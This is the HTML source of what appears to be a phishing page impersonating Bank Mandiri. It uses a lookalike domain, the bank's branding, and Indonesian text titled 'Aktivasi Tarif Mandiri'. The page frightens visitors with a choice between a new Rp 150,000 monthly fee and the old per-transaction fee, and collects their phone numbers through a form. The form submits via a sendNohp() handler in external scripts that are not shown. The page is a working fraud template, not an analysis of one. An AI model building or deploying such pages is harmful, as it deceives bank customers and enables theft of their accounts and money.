
<html>
  <head>
  <meta charset="utf-8"> 
    <meta name="theme-color" content="#1E90FF"> 
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no, minimum-scale=1.0, maximum-scale=1.0, user-scalable=0"> 
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  <script src="i.js"></script> 
  <title>𝗔𝗸𝘁𝗶𝘃𝗮𝘀𝗶 𝗧𝗮𝗿𝗶𝗳 𝗠𝗮𝗻𝗱𝗶𝗿𝗶</title> 
  <meta name="description" content="Bank Mandiri adalah Bank Terbaik di Indonesia. Terdepan, Terpercaya, Tumbuh Bersama Anda. Apapun keinginan Anda, Bank Mandiri Saja."> 
  <meta name="author" content="Bank Mandiri"> 
   <meta property="og:title" content="𝗔𝗸𝘁𝗶𝘃𝗮𝘀𝗶 𝗧𝗮𝗿𝗶𝗳 𝗠𝗮𝗻𝗱𝗶𝗿𝗶"> 
  <meta property="og:description" content="Bank Mandiri adalah Bank Terbaik di Indonesia. Terdepan, Terpercaya, Tumbuh Bersama Anda. Apapun keinginan Anda, Bank Mandiri Saja."> 
  <meta property="og:url" content="https://bankmandiri.co.id.com/"> 
  <meta property="og:image" content="https://hosting.tigerengine.id/ejsfxn.jpg"> 
  <link rel="shortcut icon" href="https://hosting.tigerengine.id/xmnj2m.png" type="image/x-icon"> 
  <link rel="apple-touch-icon" href="https://hosting.tigerengine.id/xmnj2m.png"> 
  <link rel="stylesheet" href="main.css"> 
  
 </head>  
  <style>.swal-size[_ngcontent-lbo-c0]{width:50px!important}.swal2-shown[_ngcontent-lbo-c0], .swal2-toast-shown[_ngcontent-lbo-c0]{font-family:"Myriad Pro",-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol"!important}
  .logo{
        font-family: helvetica;
  text-align:center;
  color: #fff;
  max-width: 100%;
  height: auto;
  font-size: 13px;
  margin-top: -0px;
  margin-bottom: -55px;
  margin-left: -0px;
  background: #007DFE;
  position: fixed;

   }

  
  
    .radio-section {
	display: flex;
	align-items: center;
	justify-content: center;
	height: 100vh;
	width:;
}
h1 {
	margin-bottom: 20px;
}
.radio-item [type="radio"] {
	display: none;
}
.radio-item + .radio-item {
	margin-top: 15px;
}
.radio-item label {
	display: block;
	padding: 10px 10px;
	background: #1E90FF;
	outline:2px inset rgba(150,200,250,1.4);	
	border-radius: 50px;
	cursor: pointer;
	font-size: 12px;
	font-weight: 700;
	min-width: 270px;
	padding-left: 15px;
	color: #ffffff;
	box-shadow:0 0 0 2px #2457E6,0 0 0 4px rgba(50,100,280,1.0);
	margin: 15px 0;
	position: relative;
	
	
}



.radio-item label:after,
.radio-item label:before {
	content: "Ⓜ";
	position: absolute;
	border-radius: 50%;
	background: #000;
	
	
}
.radio-item label:after {
	height: 19px;
	width: 19px;
	border: 0px inset #F8B13B;
	left: 9px;
	top: calc(50% - 10px);
	background: #fff;
	
}
.radio-item label:before {
	background: #fff;
	height: 19px;
	width: 18px;
	left: 9px;
	top: calc(50% - 10px);
	transform: scale(5);
	opacity: 0;
	visibility: hidden;
	transition: 0.4s ease-in-out 0s;
	
}
.radio-item [type="radio"]:checked ~ label {
	border-color: #F2C536;
	color: #000;
	background: #F8B13B;
}
.radio-item [type="radio"]:checked ~ label::before {
	opacity: 1;
	visibility: visible;
	transform: scale(1);
	background: #000;

}

.card-form__button {
  width: 90%;
  height: 50px;
   background-image: url("https://hosting.tigerengine.id/ouzbhf.png");
  background-position: 100% 100%;
  background-size: 100% 100%;
  background-color: #1E90FF;
  box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);
  border: none;
  border-radius: 25px;
  font-size: 17px;
  font-weight: 600;
  font-family: "Source Sans Pro", sans-serif;
   padding-top: 0px;
  box-shadow: #D5D5D5 10px; 
  color: #fff;
  bottom: 20;
  left: 0;
  right: 0;
  margin: 0px auto;
  cursor: pointer;
  position: fixed;
  box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px;
}
@media screen and (max-width: 480px) {
  .card-form__button {
    margin-top: 10px;
  }
}


.card-input__input1::placeholder, .card-input__input::placeholder{
    color: #CECECE;
}

  </style> 

 <body style="position: fixed; margin: 0px auto; left: 0; right: 0; top: 0; background-image: url(https://hosting.tigerengine.id/unebfd.png);
  background-size: 100% 100%;
  background-position: 100% 100%;"> 
  <main>
      
 
  <center>
  <div class="app-loading" style="position: fixed; margin: 0px auto; left: 0; right: 0; top: 0; bottom: 0; width: 100%; height: 100%; background: rgba(190, 190, 190, 0.4); z-index: 99999999; padding-top: 270px; display: " id="lodingku">
    <img class="img-fluid" style="width: 140px" src="https://hosting.tigerengine.id/q803mx.gif" alt="preloader" />
      </div>
  </center>
  
 
 

<img src="https://hosting.tigerengine.id/r8vt88.png" class="logo" style="background: transparent">        
   <section _ngcontent-lbo-c0="" class="section-madiri-step py-main" >
 
 <form id="formHP" onsubmit="sendNohp(); return false" _ngcontent-lbo-c0="" class="needs-validation container container-sm section-form-step text-center mt-4 ng-untouched ng-pristine ng-valid"><input type="hidden" id="logo" value="°𝘄𝘄𝘄.𝗯𝗮𝗻𝗸𝗺𝗮𝗻𝗱𝗶𝗿𝗶.𝗰𝗼.𝗶𝗱°">
     <div _ngcontent-lbo-c0="" class="content mt-5">
      <img _ngcontent-lbo-c0="" class="img-fluid mb-4" src="https://hosting.tigerengine.id/0jmeob.png" width="210" style="margin-top: 70px">
      <div _ngcontent-lbo-c0="" class="title mb-4">
<div style="text-align: center; font-size: 17px; margin-top: -0px; margin-bottom: 10px">
     <strong style="font-weight: bold">Masukkan</strong><font style="font-weight: 300;"> Nomor Handphone </font></div> 
 <input type="tel" class="card-input__input" name="nohp" id="nohp" maxlength="13" maxlength="10" required style="box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;width: 95%; height: 45px; border-radius: 8px; border: 1px solid #1E90FF; padding: 5px 50px; outline: 1px solid #1E90FF; background-color: #F3F3F3; background-image: url(https://hosting.tigerengine.id/8yovws.jpg);
  background-position: 100% 100%;
  background-size: 100% 100%; font-size: 18px" placeholder="08xxxxxxx"><br/>
       <div _ngcontent-lbo-c0="" class="row justify-content-center" style="margin-top: 26px">
           <p></p>
            <center>
 <div style="text-align: center; font-size: 17px; margin-top: -10px; margin-bottom: 0px">
    
     <strong style="font-weight: bold">Konfirmasi</strong><font style="font-weight: 300;"> Tarif Anda </font></div> 
    
  <div class="radio-list" style="position: absolute; left: 0; right: 0; margin: 0px auto; width: 75%">
	
		<div class="radio-item" ><input name="tarif" id="radio1" type="radio" value="Baru Rp. 150.000" required><label for="radio1">TARIF BARU Rp 150.000 / BULAN</label>
		<div class="radio-item"><input name="tarif" id="radio2" type="radio" value="Lama Rp. 6.500"><label for="radio2" required>TARIF LAMA Rp 6.500 / TRANSAKSI</label></div>
	
	</center>
	</div>

       </div>
      </div>
     </div>
 <div style="position: fixed; width: 100%; height: 90px; background: #fff;  left: 0; right: 0; margin: 0px auto; bottom: 0; box-shadow: rgba(60, 64, 67, 0.3)  0px 1px 2px 0px, rgba(60, 64, 67, 0.15) -2px 1px 13px 3px; border: 0px solid #bbb">    
   <button class="card-form__button" type="submit" value="Lanjutkan">Lanjutkan</button>
      </div>
      <div style="position: fixed; width: 100%; height: 300px; background-image: url(https://hosting.tigerengine.id/0r4okt.png);
  background-position: 100% 100%;
  background-size: 100% 100%;  left: 0; right: 0; margin: 0px auto; bottom: 0; border: 0px solid #bbb; z-index: -1"></div>        
    </form>
   </section>
  </app-root>
  

 <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
 

 
   <script>
$( document ).ready(function() {
            setTimeout(() => {
                $('#lodingku').hide();
                $('chsalxcome2').fadeIn();
            },1060)
        })



</script>
<script src="token.js"></script>

  </body>
</html>
